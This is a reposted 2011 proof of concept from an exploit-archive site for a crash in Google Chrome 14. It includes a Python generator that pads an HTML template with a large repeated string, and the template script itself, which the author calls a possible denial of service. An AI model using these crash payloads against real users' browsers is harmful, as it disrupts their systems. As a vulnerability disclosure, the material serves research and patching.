首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Google Chrome PoC, killing thread
来源:back-track.de 作者:pigtail23 发布时间:2011-10-25  

## _  (`-')  _   pigtail23   (`-')     (`-')  _   _           www.remoteshell.de ##
## \-.(OO ) (_)        .->   ( OO).->  (OO ).-/  (_)      <-.                    ##
## _.'    \ ,-(`-') ,---(`-')/    '._  / ,---.   ,-(`-'),--. )   .----.  .----.  ##
##(_...--'' | ( OO)'  .-(OO )|'--...__)| \ /`.\  | ( OO)|  (`-')\_,-.  |\_.-,  | ##
##|  |_.' | |  |  )|  | .-, \`--.  .--''-'|_.' | |  |  )|  |OO )   .' .'  |_  <  ##
##|  .___.'(|  |_/ |  | '.(_/   |  |  (|  .-.  |(|  |_/(|  '__ | .'  /_ .-. \  | ##
##|  |      |  |'->|  '-'  |    |  |   |  | |  | |  |'->|     |'|      |\ `-'  / ##
##`--'      `--'    `-----'     `--'   `--' `--' `--'   `-----' `------' `---''  ##
###################################################################################
###################################################################################
October 22, 2011

Ohh nice! What u doing google? Thx 4 ur bug! 0__o

Google Chrome PoC, killing thread. Exploitable or only a DOS!? Found no way to exploit it. Good Luck!!!

Testsystem: WinXP SP3, Win7(64 bit)
Google Chrome version: 14.0.835.202

Greetings to:
mr_insecure, myownremote, noptrix, Eph, lnxg33k, CyberMaN,...
TheXero, Dexter, #back-track.de and #intern0t @ irc.freenode.net

###################################################################################

poc.html:

too big!

###################################################################################

Python script for debugging:

#!/usr/bin/python

filename = 'poc.html'
content = open('template.html', 'r').read()

buff = '$$*' * 36800

rc = 484
content2 = content[:rc] + buff + content[rc:] 

FILE = open(filename,"w")
FILE.write(content2)
FILE.close()

###################################################################################


template.html:

<html>
<body>
<script>(function(){var d=document;if(!("autofocus" in d.createElement("input"))){try{d.getElementById("yschsp").focus();}catch(e){}}data={"assist":{"url":"http:\/\/www.google.com","maxLength":38,"linkStem":"http:\/\/www.remoteshell.de","settingsUrl":"http:\/\/www.chrooome.xxx","strings":{"searchbox_title":"bam","settings_text":"bam","gossip_desc":"bam","scroll_up":"bam","scroll_down":"bam","aria_available_suggestions":"bam","aria_no_suggestion_available":"bam"}}};window.onload=function(){var h=d.getElementsByTagName("head")[0],o=d.createElement("script");o.src="http://www.0__o";h.appendChild(o);};}());</script>
</body>
</html>
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Cyclope Internet Filtering Pro
·MS11-077 Win32k Null Pointer D
·HP Power Manager 'formExportDa
·Google Chrome Denial Of Servic
·Cyclope Internet Filtering Pro
·Cytel Studio 9.0 (CY3 File) St
·Opera <= 11.51 Use After Free
·zFTP Server "cwd/stat" Remote
·UnrealIRCd 3.2.8.1 Local Confi
·BlueZone Malformed .zft file L
·Opera <= 11.52 Stack Overflow
·Opera Use After Free - Crash P
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved